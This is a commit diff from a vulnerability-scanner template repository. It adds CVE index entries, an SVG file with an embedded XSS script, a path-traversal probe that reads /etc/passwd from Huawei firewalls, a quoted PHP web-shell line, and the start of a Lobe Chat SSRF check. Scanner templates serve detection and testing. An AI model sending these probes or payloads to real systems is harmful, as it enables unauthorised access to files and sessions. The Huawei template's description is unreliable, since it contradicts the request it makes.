Merge branch 'main' into main

patch-12
evilgensec 2024-10-05 21:51:45 +05:45 committed by GitHub
commit cd4a4fc30a
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
221 changed files with 1286 additions and 266 deletions


@ -1,10 +1,24 @@
code/cves/2024/CVE-2024-45409.yaml
http/cves/2017/CVE-2017-5871.yaml
http/cves/2019/CVE-2019-19411.yaml
http/cves/2021/CVE-2021-25094.yaml
http/cves/2024/CVE-2024-32964.yaml
http/cves/2024/CVE-2024-43160.yaml
http/cves/2024/CVE-2024-43917.yaml
http/cves/2024/CVE-2024-45440.yaml
http/cves/2024/CVE-2024-46627.yaml
http/cves/2024/CVE-2024-5488.yaml
http/cves/2024/CVE-2024-6517.yaml
http/cves/2024/CVE-2024-7354.yaml
http/cves/2024/CVE-2024-7714.yaml
http/cves/2024/CVE-2024-8877.yaml
http/default-logins/datagerry/datagerry-default-login.yaml
http/exposed-panels/gitlab-saml.yaml
http/exposed-panels/riello-netman204-panel.yaml
http/miscellaneous/seized-site.yaml
http/misconfiguration/microsoft/aspnetcore-dev-env.yaml
http/technologies/arcgis-detect.yaml
http/technologies/vertigis-detect.yaml
http/technologies/wiki-js-detect.yaml
http/token-spray/api-intigriti.yaml
http/vulnerabilities/retool/retool-svg-xss.yaml


@ -749,6 +749,7 @@
{"ID":"CVE-2019-1898","Info":{"Name":"Cisco RV110W RV130W RV215W Router - Information leakage","Severity":"medium","Description":"A vulnerability in the web-based management interface of Cisco RV110W, RV130W, and RV215W Routers could allow an unauthenticated, remote attacker to access the syslog file on an affected device. The vulnerability is due to improper authorization of an HTTP request. An attacker could exploit this vulnerability by accessing the URL for the syslog file. A successful exploit could allow the attacker to access the information contained in the file.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2019/CVE-2019-1898.yaml"}
{"ID":"CVE-2019-19134","Info":{"Name":"WordPress Hero Maps Premium \u003c=2.2.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Hero Maps Premium plugin 2.2.1 and prior contains an unauthenticated reflected cross-site scripting vulnerability via the views/dashboard/index.php p parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-19134.yaml"}
{"ID":"CVE-2019-19368","Info":{"Name":"Rumpus FTP Web File Manager 8.2.9.1 - Cross-Site Scripting","Severity":"medium","Description":"Rumpus FTP Web File Manager 8.2.9.1 contains a reflected cross-site scripting vulnerability via the Login page. An attacker can send a crafted link to end users and can execute arbitrary JavaScript.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-19368.yaml"}
{"ID":"CVE-2019-19411","Info":{"Name":"Huawei Firewall - Local File Inclusion","Severity":"low","Description":"USG9500 with versions of V500R001C30SPC100, V500R001C30SPC200, V500R001C30SPC600, V500R001C60SPC500, V500R005C00SPC100, V500R005C00SPC200 have an information leakage vulnerability. Due to improper processing of the initialization vector used in a specific encryption algorithm, an attacker who gains access to this cryptographic primitive may exploit this vulnerability to cause the value of the confidentiality associated with its use to be diminished.\n","Classification":{"CVSSScore":"3.7"}},"file_path":"http/cves/2019/CVE-2019-19411.yaml"}
{"ID":"CVE-2019-1943","Info":{"Name":"Cisco Small Business 200,300 and 500 Series Switches - Open Redirect","Severity":"medium","Description":"Cisco Small Business 200,300 and 500 Series Switches contain an open redirect vulnerability in the Web UI. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-1943.yaml"}
{"ID":"CVE-2019-19781","Info":{"Name":"Citrix ADC and Gateway - Directory Traversal","Severity":"critical","Description":"Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0 are susceptible to directory traversal vulnerabilities.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-19781.yaml"}
{"ID":"CVE-2019-19824","Info":{"Name":"TOTOLINK Realtek SD Routers - Remote Command Injection","Severity":"high","Description":"TOTOLINK Realtek SDK based routers may allow an authenticated attacker to execute arbitrary OS commands via the sysCmd parameter to the boafrm/formSysCmd URI, even if the GUI (syscmd.htm) is not available. This allows for full control over the device's internals. This affects A3002RU through 2.0.0, A702R through 2.1.3, N301RT through 2.1.6, N302R through 3.4.0, N300RT through 3.4.0, N200RE through 4.0.0, N150RT through 3.4.0, and N100RE through 3.4.0.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2019/CVE-2019-19824.yaml"}
@ -2522,6 +2523,7 @@
{"ID":"CVE-2024-32709","Info":{"Name":"WP-Recall \u003c= 16.26.5 - SQL Injection","Severity":"critical","Description":"The WP-Recall Registration, Profile, Commerce \u0026 More plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 16.26.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.3"}},"file_path":"http/cves/2024/CVE-2024-32709.yaml"}
{"ID":"CVE-2024-3273","Info":{"Name":"D-Link Network Attached Storage - Command Injection and Backdoor Account","Severity":"critical","Description":"UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. Affected is an unknown function of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument system leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259284. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-3273.yaml"}
{"ID":"CVE-2024-3274","Info":{"Name":"D-LINK DNS-320L,DNS-320LW and DNS-327L - Information Disclosure","Severity":"medium","Description":"A vulnerability has been found in D-Link DNS-320L, DNS-320LW and DNS-327L up to 20240403 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /cgi-bin/info.cgi of the component HTTP GET Request Handler.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-3274.yaml"}
{"ID":"CVE-2024-32964","Info":{"Name":"Lobe Chat \u003c= v0.150.5 - Server-Side Request Forgery","Severity":"critical","Description":"Lobe Chat is a chatbot framework that supports speech synthesis, multimodal, and extensible Function Call plugin system. Prior to 0.150.6, lobe-chat had an unauthorized Server-Side Request Forgery vulnerability in the /api/proxy endpoint. An attacker can construct malicious requests to cause Server-Side Request Forgery without logging in, attack intranet services, and leak sensitive information.\n","Classification":{"CVSSScore":"9"}},"file_path":"http/cves/2024/CVE-2024-32964.yaml"}
{"ID":"CVE-2024-33113","Info":{"Name":"D-LINK DIR-845L bsc_sms_inbox.php file - Information Disclosure","Severity":"medium","Description":"D-LINK DIR-845L \u003c=v1.01KRb03 is vulnerable to Information disclosurey via bsc_sms_inbox.php.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-33113.yaml"}
{"ID":"CVE-2024-33288","Info":{"Name":"Prison Management System - SQL Injection Authentication Bypass","Severity":"high","Description":"Sql injection vulnerability was found on the login page in Prison Management System\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-33288.yaml"}
{"ID":"CVE-2024-33575","Info":{"Name":"User Meta WP Plugin \u003c 3.1 - Sensitive Information Exposure","Severity":"medium","Description":"The User Meta is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.0 via the /views/debug.php file. This makes it possible for unauthenticated attackers, with to extract sensitive configuration data.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-33575.yaml"}
@ -2578,6 +2580,7 @@
{"ID":"CVE-2024-43425","Info":{"Name":"Moodle - Remote Code Execution","Severity":"critical","Description":"Attackers with the permission to create or modify questions in Moodle courses are able to craft malicious inputs for calculated questions, which can be abused to execute arbitrary commands on the underlying system.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-43425.yaml"}
{"ID":"CVE-2024-4348","Info":{"Name":"osCommerce v4.0 - Cross-site Scripting","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in osCommerce 4. Affected is an unknown function of the file /catalog/all-products. The manipulation of the argument cat leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-4348.yaml"}
{"ID":"CVE-2024-4358","Info":{"Name":"Progress Telerik Report Server - Authentication Bypass","Severity":"critical","Description":"In Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, on IIS, an unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4358.yaml"}
{"ID":"CVE-2024-43917","Info":{"Name":"WordPress TI WooCommerce Wishlist Plugin \u003c= 2.8.2 - SQL Injection","Severity":"critical","Description":"In the latest version (2.8.2 as of writing the article) and below, the plugin is vulnerable to a SQL injection vulnerability that allows any users to execute arbitrary SQL queries in the database of the WordPress site. No privileges are required to exploit the issue. The vulnerability is unpatched on the latest version and is tracked as the CVE-2024-43917.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-43917.yaml"}
{"ID":"CVE-2024-44000","Info":{"Name":"LiteSpeed Cache \u003c= 6.4.1 - Sensitive Information Exposure","Severity":"high","Description":"The LiteSpeed Cache plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 6.4.1 through the debug.log file that is publicly exposed. This makes it possible for unauthenticated attackers to view potentially sensitive information contained in the exposed log file. The log file may contain user cookies making it possible for an attacker to log in with any session that is actively valid and exposed in the log file. Note: the debug feature must be enabled for this to be a concern and this feature is disabled by default.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-44000.yaml"}
{"ID":"CVE-2024-4434","Info":{"Name":"LearnPress WordPress LMS Plugin \u003c= 4.2.6.5 - SQL Injection","Severity":"critical","Description":"The LearnPress WordPress LMS Plugin plugin for WordPress is vulnerable to time-based SQL Injection via the term_id parameter in versions up to, and including, 4.2.6.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-4434.yaml"}
{"ID":"CVE-2024-4443","Info":{"Name":"Business Directory Plugin \u003c= 6.4.2 - SQL Injection","Severity":"critical","Description":"The Business Directory Plugin Easy Listing Directories for WordPress plugin for WordPress is vulnerable to time-based SQL Injection via the listingfields parameter in all versions up to, and including, 6.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-4443.yaml"}
@ -2585,9 +2588,11 @@
{"ID":"CVE-2024-45195","Info":{"Name":"Apache OFBiz - Remote Code Execution","Severity":"high","Description":"Apache OFBiz below 18.12.16 is vulnerable to unauthenticated remote code execution on Linux and Windows. An attacker with no valid credentials can exploit missing view authorization checks in the web application to execute arbitrary code on the server\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-45195.yaml"}
{"ID":"CVE-2024-45241","Info":{"Name":"CentralSquare CryWolf - Path Traversal","Severity":"high","Description":"A traversal vulnerability in GeneralDocs.aspx in CentralSquare CryWolf (False Alarm Management) through 2024-08-09 allows unauthenticated attackers to read files outside of the working web directory via the rpt parameter, leading to the disclosure of sensitive information.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-45241.yaml"}
{"ID":"CVE-2024-45388","Info":{"Name":"Hoverfly \u003c 1.10.3 - Arbitrary File Read","Severity":"high","Description":"Hoverfly is a lightweight service virtualization/ API simulation / API mocking tool for developers and testers. The /api/v2/simulation POST handler allows users to create new simulation views from the contents of a user-specified file. This feature can be abused by an attacker to read arbitrary files from the Hoverfly server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-45388.yaml"}
{"ID":"CVE-2024-45440","Info":{"Name":"Drupal 11.x-dev - Full Path Disclosure","Severity":"medium","Description":"core/authorize.php in Drupal 11.x-dev allows Full Path Disclosure (even when error logging is None) if the value of hash_salt is file_get_contents of a file that does not exist.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-45440.yaml"}
{"ID":"CVE-2024-45507","Info":{"Name":"Apache OFBiz - Remote Code Execution","Severity":"critical","Description":"Apache OFBiz below 18.12.16 is vulnerable to unauthenticated remote code execution on Linux and Windows. An attacker with no valid credentials can exploit missing view authorization checks in the web application to execute arbitrary code on the server\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-45507.yaml"}
{"ID":"CVE-2024-45622","Info":{"Name":"ASIS - SQL Injection Authentication Bypass","Severity":"critical","Description":"ASIS (aka Aplikasi Sistem Sekolah using CodeIgniter 3) 3.0.0 through 3.2.0 allows index.php username SQL injection for Authentication Bypass.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-45622.yaml"}
{"ID":"CVE-2024-4577","Info":{"Name":"PHP CGI - Argument Injection","Severity":"critical","Description":"PHP CGI - Argument Injection (CVE-2024-4577) is a critical argument injection flaw in PHP.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4577.yaml"}
{"ID":"CVE-2024-46627","Info":{"Name":"DATAGERRY - REST API Auth Bypass","Severity":"critical","Description":"Incorrect access control in BECN DATAGERRY v2.2 allows attackers to execute arbitrary commands via crafted web requests.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2024/CVE-2024-46627.yaml"}
{"ID":"CVE-2024-46986","Info":{"Name":"Camaleon CMS \u003c 2.8.1 Arbitrary File Write to RCE","Severity":"critical","Description":"An arbitrary file write vulnerability accessible via the upload method of the MediaController allows authenticated users to write arbitrary files to any location on the web server Camaleon CMS is running on (depending on the permissions of the underlying filesystem). E.g. This can lead to a remote code execution in case an attacker is able to write a Ruby file into the config/initializers/ subfolder of the Ruby on Rails application\n","Classification":{"CVSSScore":"9.9"}},"file_path":"http/cves/2024/CVE-2024-46986.yaml"}
{"ID":"CVE-2024-47062","Info":{"Name":"Navidrome \u003c 0.53.0 - Authenticated SQL Injection","Severity":"critical","Description":"Navidrome is an open source web-based music collection server and streamer. Navidrome automatically adds parameters in the URL to SQL queries. This can be exploited to access information by adding parameters like `password=...` in the URL (ORM Leak). Furthermore, the names of the parameters are not properly escaped, leading to SQL Injections. Finally, the username is used in a `LIKE` statement, allowing people to log in with `%` instead of their username. When adding parameters to the URL, they are automatically included in an SQL `LIKE` statement (depending on the parameter's name). This allows attackers to potentially retrieve arbitrary information. For example, attackers can use the following request to test whether some encrypted passwords start with `AAA`. This results in an SQL query like `password LIKE 'AAA%'`, allowing attackers to slowly brute-force passwords. When adding parameters to the URL, they are automatically added to an SQL query. The names of the parameters are not properly escaped. This behavior can be used to inject arbitrary SQL code (SQL Injection). These vulnerabilities can be used to leak information and dump the contents of the database and have been addressed in release version 0.53.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-47062.yaml"}
{"ID":"CVE-2024-4836","Info":{"Name":"Edito CMS - Sensitive Data Leak","Severity":"high","Description":"Web services managed by Edito CMS (Content Management System) in versions from 3.5 through 3.25 leak sensitive data as they allow downloading configuration files by an unauthorized user.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4836.yaml"}
@ -2601,6 +2606,7 @@
{"ID":"CVE-2024-5315","Info":{"Name":"Dolibarr ERP CMS `list.php` - SQL Injection","Severity":"critical","Description":"Vulnerabilities in Dolibarr ERP - CRM that affect version 9.0.1 and allow SQL injection.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2024/CVE-2024-5315.yaml"}
{"ID":"CVE-2024-5420","Info":{"Name":"SEH utnserver Pro/ProMAX/INU-100 20.1.22 - Cross-Site Scripting","Severity":"high","Description":"A vulnerability was found in utnserver Pro, utnserver ProMAX, and INU-100 version 20.1.22 and earlier, affecting the device description parameter in the web interface. This flaw allows stored cross-site scripting (XSS), enabling attackers to inject JavaScript code. The attack can be executed remotely by tricking victims into visiting a malicious website, potentially leading to session hijacking. This vulnerability is publicly disclosed and identified as CVE-2024-5420.\n","Classification":{"CVSSScore":"8.3"}},"file_path":"http/cves/2024/CVE-2024-5420.yaml"}
{"ID":"CVE-2024-5421","Info":{"Name":"SEH utnserver Pro/ProMAX/INU-100 20.1.22 - File Exposure","Severity":"high","Description":"A vulnerability was identified in utnserver Pro, utnserver ProMAX, and INU-100 version 20.1.22 and earlier, impacting the file handling functions. This flaw results in authenticated file disclosure, granting unauthorized access to sensitive files and directories. Although authentication is required, the vulnerability poses a significant risk of data exposure. This vulnerability is publicly disclosed and identified as CVE-2024-5421.\n","Classification":{"CVSSScore":"8.7"}},"file_path":"http/cves/2024/CVE-2024-5421.yaml"}
{"ID":"CVE-2024-5488","Info":{"Name":"SEOPress \u003c 7.9 - Authentication Bypass","Severity":"critical","Description":"The SEOPress WordPress plugin before 7.9 does not properly protect some of its REST API routes, which combined with another Object Injection vulnerability can allow unauthenticated attackers to unserialize malicious gadget chains, compromising the site if a suitable chain is present.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-5488.yaml"}
{"ID":"CVE-2024-5522","Info":{"Name":"WordPress HTML5 Video Player \u003c 2.5.27 - SQL Injection","Severity":"critical","Description":"The HTML5 Video Player WordPress plugin before 2.5.27 does not sanitize and escape a parameter from a REST route before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-5522.yaml"}
{"ID":"CVE-2024-5765","Info":{"Name":"WpStickyBar \u003c= 2.1.0 - SQL Injection","Severity":"high","Description":"The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-5765.yaml"}
{"ID":"CVE-2024-5827","Info":{"Name":"Vanna - SQL injection","Severity":"critical","Description":"Vanna v0.3.4 is vulnerable to SQL injection in its DuckDB integration exposed to its Flask Web APIs. Attackers can inject malicious SQL training data and generate corresponding queries to write arbitrary files on the victim's file system, such as backdoor.php with contents `\u003c?php system($_GET[0]); ?\u003e`. This can lead to command execution or the creation of backdoors.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-5827.yaml"}
@ -2616,6 +2622,7 @@
{"ID":"CVE-2024-6289","Info":{"Name":"WPS Hide Login \u003c 1.9.16.4 - Hidden Login Page Disclosure","Severity":"medium","Description":"The WPS Hide Login WordPress plugin before 1.9.16.4 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the hidden login page.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-6289.yaml"}
{"ID":"CVE-2024-6366","Info":{"Name":"User Profile Builder \u003c 3.11.8 - File Upload","Severity":"high","Description":"The User Profile Builder WordPress plugin before 3.11.8 does not have proper authorisation, allowing unauthenticated users to upload media files via the async upload functionality of WP.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-6366.yaml"}
{"ID":"CVE-2024-6396","Info":{"Name":"Aimhubio Aim Server 3.19.3 - Arbitrary File Overwrite","Severity":"critical","Description":"A vulnerability in the `_backup_run` function in aimhubio/aim version 3.19.3 allows remote attackers to overwrite any file on the host server and exfiltrate arbitrary data. The vulnerability arises due to improper handling of the `run_hash` and `repo.path` parameters, which can be manipulated to create and write to arbitrary file paths. This can lead to denial of service by overwriting critical system files, loss of private data, and potential remote code execution.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-6396.yaml"}
{"ID":"CVE-2024-6517","Info":{"Name":"Contact Form 7 Math Captcha \u003c= 2.0.1 - Cross-site Scripting","Severity":"medium","Description":"The Contact Form 7 Math Captcha WordPress plugin through 2.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-6517.yaml"}
{"ID":"CVE-2024-6586","Info":{"Name":"Lightdash v0.1024.6 - Server-Side Request Forgery","Severity":"high","Description":"Server-Side Request Forgery (“SSRF”) in the export dashboard functionality of Lightdash version 0.1024.6 allows remote authenticated threat actors to obtain the session cookie of any user who exports a crafted dashboard. When they are exported, dashboards containing HTML elements can trigger HTTP requests to an external domain that contain the exporting users session cookie. The cookie could be stolen by a threat actor and used to hijack application user sessions.\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-6586.yaml"}
{"ID":"CVE-2024-6587","Info":{"Name":"LiteLLM - Server-Side Request Forgery","Severity":"high","Description":"LiteLLM vulnerable to Server-Side Request Forgery (SSRF) vulnerability Exposes OpenAI API Keys.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-6587.yaml"}
{"ID":"CVE-2024-6646","Info":{"Name":"Netgear-WN604 downloadFile.php - Information Disclosure","Severity":"medium","Description":"There is an information leakage vulnerability in the downloadFile.php interface of Netgear WN604. A remote attacker using file authentication can use this vulnerability to obtain the administrator account and password information of the wireless router, causing the router's background to be controlled. The attacker can initiate damage to the wireless network or further threaten it.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-6646.yaml"}
@ -2639,7 +2646,9 @@
{"ID":"CVE-2024-7332","Info":{"Name":"TOTOLINK CP450 v4.1.0cu.747_B20191224 - Hard-Coded Password Vulnerability","Severity":"critical","Description":"A critical vulnerability has been discovered in TOTOLINK CP450 version 4.1.0cu.747_B20191224. This vulnerability affects an unknown part of the file /web_cste/cgi-bin/product.ini of the Telnet Service component. The issue stems from the use of a hard-coded password, which can be exploited remotely without any user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-7332.yaml"}
{"ID":"CVE-2024-7339","Info":{"Name":"TVT DVR Sensitive Device - Information Disclosure","Severity":"medium","Description":"A vulnerability has been found in TVT DVR TD-2104TS-CL, DVR TD-2108TS-HP, Provision-ISR DVR SH-4050A5-5L(MM) and AVISION DVR AV108T and classified as problematic. This vulnerability affects unknown code of the file /queryDevInfo. The manipulation leads to information disclosure.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-7339.yaml"}
{"ID":"CVE-2024-7340","Info":{"Name":"W\u0026B Weave Server - Remote Arbitrary File Leak","Severity":"high","Description":"The Weave server API allows remote users to fetch files from a specific directory, but due to a lack of input validation, it is possible to traverse and leak arbitrary files remotely. In various common scenarios, this allows a low-privileged user to assume the role of the server admin.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2024/CVE-2024-7340.yaml"}
{"ID":"CVE-2024-7354","Info":{"Name":"Ninja Forms 3.8.6-3.8.10 - Cross-Site Scripting","Severity":"medium","Description":"The Ninja Forms WordPress plugin before 3.8.11 does not escape an URL before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-7354.yaml"}
{"ID":"CVE-2024-7593","Info":{"Name":"Ivanti vTM - Authentication Bypass","Severity":"critical","Description":"Incorrect implementation of an authentication algorithm in Ivanti vTM other than versions 22.2R1 or 22.7R2 allows a remote unauthenticated attacker to bypass authentication of the admin panel.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-7593.yaml"}
{"ID":"CVE-2024-7714","Info":{"Name":"AI Assistant with ChatGPT by AYS \u003c= 2.0.9 - Unauthenticated AJAX Calls","Severity":"medium","Description":"The plugin lacks sufficient access controls allowing an unauthenticated user to disconnect the plugin from OpenAI, thereby disabling the plugin. Multiple actions are accessible: ays_chatgpt_disconnect, ays_chatgpt_connect, and ays_chatgpt_save_feedback\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2024/CVE-2024-7714.yaml"}
{"ID":"CVE-2024-7786","Info":{"Name":"Sensei LMS \u003c 4.24.2 - Email Template Leak","Severity":"high","Description":"The Sensei LMS WordPress plugin before 4.24.2 does not properly protect some its REST API routes, allowing unauthenticated attackers to leak email templates.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-7786.yaml"}
{"ID":"CVE-2024-7928","Info":{"Name":"FastAdmin \u003c V1.3.4.20220530 - Path Traversal","Severity":"medium","Description":"A vulnerability, which was classified as problematic, has been found in FastAdmin up to 1.3.3.20220121. Affected by this issue is some unknown functionality of the file /index/ajax/lang. The manipulation of the argument lang leads to path traversal. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.3.4.20220530 is able to address this issue. It is recommended to upgrade the affected component.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-7928.yaml"}
{"ID":"CVE-2024-7954","Info":{"Name":"SPIP Porte Plume Plugin - Remote Code Execution","Severity":"critical","Description":"The porte_plume plugin used by SPIP before 4.30-alpha2, 4.2.13, and 4.1.16 is vulnerable to an arbitrary code execution vulnerability. A remote and unauthenticated attacker can execute arbitrary PHP as the SPIP user by sending a crafted HTTP request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-7954.yaml"}


@ -1 +1 @@
b6a34b5af003995fdb01f1a9faa80b94
34d767d0d4ce4e7d79ac3e12ad34b41b


@ -0,0 +1,8 @@
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert('document.domain');
</script>
</svg>



@ -0,0 +1,47 @@
id: CVE-2019-19411
info:
name: Huawei Firewall - Local File Inclusion
author: taielab
severity: low
description: |
USG9500 with versions of V500R001C30SPC100, V500R001C30SPC200, V500R001C30SPC600, V500R001C60SPC500, V500R005C00SPC100, V500R005C00SPC200 have an information leakage vulnerability. Due to improper processing of the initialization vector used in a specific encryption algorithm, an attacker who gains access to this cryptographic primitive may exploit this vulnerability to cause the value of the confidentiality associated with its use to be diminished.
reference:
- https://www.huawei.com/en/psirt/security-advisories/huawei-sa-20200115-01-firewall-en
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 3.7
cve-id: CVE-2019-19411
cwe-id: CWE-665
epss-score: 0.00078
epss-percentile: 0.34692
cpe: cpe:2.3:h:huawei:usg9500:-:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: huawei
product: usg9500
shodan-query: title:"HUAWEI"
tags: cve,cve2019,huawei,firewall,lfi
http:
- method: GET
path:
- "{{BaseURL}}/umweb/../etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:[x*]:0:0:"
- type: word
part: header
words:
- "application/octet-stream"
- type: status
status:
- 200
# digest: 4a0a0047304502201592da827242899c082ee79fadb679c8f4d09f39015c2826f479656d871f61d8022100b1df18deb058c6e3ab7a79da64776a7d4cecf21ca4f9a2fb6efee7785266ae55:922c64590222798bb761d5b6d8e72950
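Review bot: The template metadata does not describe what the request checks: `name` and the `lfi` tag say Local File Inclusion and the request fetches `{{BaseURL}}/umweb/../etc/passwd`, but `description`, `cwe-id: CWE-665` and the 3.7 score describe an initialization-vector weakness in an encryption algorithm. A hit would be triaged as a low-severity cryptographic issue even though the matchers confirm that a system file was returned, so either the CVE mapping or the description should be corrected before this ships. If the mapping is confirmed, I would replace the description with one sentence stating that an unauthenticated request can read files outside the web root, and add a `remediation:` field pointing to the vendor advisory already listed under `reference`. Indentation is lost in this rendering, so the nesting of the `matchers` entries could not be checked here.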


@ -0,0 +1,59 @@
id: CVE-2024-32964
info:
name: Lobe Chat <= v0.150.5 - Server-Side Request Forgery
author: s4e-io
severity: critical
description: |
Lobe Chat is a chatbot framework that supports speech synthesis, multimodal, and extensible Function Call plugin system. Prior to 0.150.6, lobe-chat had an unauthorized Server-Side Request Forgery vulnerability in the /api/proxy endpoint. An attacker can construct malicious requests to cause Server-Side Request Forgery without logging in, attack intranet services, and leak sensitive information.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-32964
- https://github.com/lobehub/lobe-chat/commit/465665a735556669ee30446c7ea9049a20cc7c37
- https://github.com/lobehub/lobe-chat/security/advisories/GHSA-mxhq-xw3g-rphc
- https://vulert.com/vuln-db/CVE-2024-32964
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:H
cvss-score: 9
cve-id: CVE-2024-32964
cwe-id: CWE-918
epss-score: 0.00043
epss-percentile: 0.09599
metadata:
verified: true
max-request: 2
vendor: lobehub
product: lobe-chat
fofa-query: icon_hash="1975020705"
tags: cve,cve2024,lobechat,ssrf
flow: http(1) && http(2)
http:
- raw:
- |
GET /welcome HTTP/1.1
Host: {{Hostname}}
host-redirects: true
matchers:
- type: dsl
dsl:
